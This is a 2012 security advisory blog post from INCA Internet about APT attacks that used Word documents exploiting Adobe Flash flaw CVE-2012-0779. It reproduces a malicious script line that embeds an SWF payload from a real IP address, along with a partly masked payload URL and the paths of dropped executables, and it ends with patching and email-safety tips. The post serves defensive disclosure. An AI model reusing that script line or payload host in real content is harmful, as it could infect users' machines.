12345

6/04/2012

[Warning] Malicious file for APT attack using CVE-2012-0779 exploit


1. Introduction

INCA Internet Response team detected attacks using latest Adobe Flash Player exploit (CVE-2012-0779).Especially we found malicious DOC files. With these reasons, users need to maintain latest Adobe Flash Player update to be safe from malicious security threats and need to be careful on downloading attachment from suspicious e-mail.



2. Cases of CVE-2012-0779

Various malicious files using CVE-2012-0779 exploit are found. Following figure shows malicious DOC files.



Malicious e-mail on April 13, 2012

This DOC file used CVE-2012-0779 exploit and is written in Korean. We can assume that this file can be used APT attack in Korea.

File name is "유통관련자료_수정본.doc". Run screen is as following.


This malicious DOC file contains script code which make user's PC access on certain URL. Malicious "exp.swf" is already being installed. Currently this malicious swf has been removed.

[download]
http://(~~)tkorea.com/uploadfiles/upload/exp.swf


This malicious file contains malicious EXE(XOR encoded).
Except this file, there were various malicious file which are written in English.


■ Malicious e-mail on May 03, 2012


"WUC Invitation Letter Guests.doc" contains CVE-2012-0779 exploit. Following figure is run screen.


DOC file includes following script code which can load malicious SWF file.

eval(document.write(unescape('%3Cembed%20src%3Dhttp://204.45.73.69/essais.swf?info=789c333230d13331d53337d633b3b432313106001afa0338&infosize=00FC0000%3E%3C/embed%3E')))


After downloading malicious file, following files will be executed in a row.

a. C:\Documents and Settings\[user account]\Application Data\Macromedia\Flash Player\#SharedObjects\temp.exe

b. C:\Documents and Settings\[user account]\Application Data\Macromedia\Flash Player\#SharedObjects\Flash_ActiveX.exe

c. C:\Documents and Settings\[user account]\Application Data\conime.exe

3. Summary

Official version of Adobe Flash Player 11.2.202.235 is distributing now. To be safe from CVE-2012-0779 exploit, users need to maintain latest update.

[Download]
http://get.adobe.com/kr/flashplayer/


To use PC safely from security threats of these malicious attachments, we recommend you download latest security updates and obey following "Security management tips" for general users.

Security management tips

1. Maintain the latest security update on OS and applications
2. Use anti-virus SW from believable security company and keep updating the latest engine and using real time detecting function “ON”
3. Do not see and download attached file from suspicious e-mail.
4. Keep caution to link from instant messenger and SNS.

INCA Internet (Security Response Center / Emergency Response Team) runs responding system against various security threats.

No comments:

Post a Comment